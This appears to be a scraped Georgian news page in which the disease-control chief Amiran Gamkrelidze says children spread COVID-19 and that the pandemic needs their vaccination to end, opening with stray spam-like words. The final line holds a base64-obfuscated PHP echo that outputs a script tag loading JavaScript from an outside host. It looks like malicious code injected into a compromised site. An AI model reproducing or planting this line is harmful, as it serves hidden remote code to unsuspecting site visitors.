celsiusi
ავერსი შნაიდერი
როგორც დაავადებათა კონტროლის ცენტრის ხელმძღვანელმა, ამირან გამყრელიძემ TV პირველის ეთერში განაცხადა, კარგია ის, რომ ეს ვირუსი ნაკლებად ერჩოდა ბავშვებს, შედარებით ადვილად იტანენ ამ ინფექციას, მაგრამ ისინი არიან აქტიური გამავრცელებლები.
 
“ჯერჯერობით, მესამე ფაზის კვლევა ბავშვებზე, ანუ 12 წლის ზემოთ, აქვს მხოლოდ ფაიზერს ჩატარებული. შეაჩერა ეს ასტრაზენეკამ, რომელსაც დაწყებული ჰქონდა კვლევები და კიდევ რამდენიმე კომპანიამ. რამდენადაც მე ვიცი, ამერიკის წამლის სააგენტოს, ჯერჯერობით არ ჰქონდა მიცემული დასტური ბავშვებში გამოყენებაზე. გიდასტურებთ იმას, რომ თუ ბავშვების ვაქცინაცია არ მოხდა, ისე, რა თქმა უნდა, რთული იქნება პანდემიის დასრულება. კარგია ის, რომ ეს ვირუსი ნაკლებად ერჩოდა ბავშვებს, შედარებით ადვილად იტანენ ამ ინფექციას, მაგრამ ისინი არიან აქტიური გამავრცელებლები”, - თქვა გამყრელიძემ.
 
 
2086
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");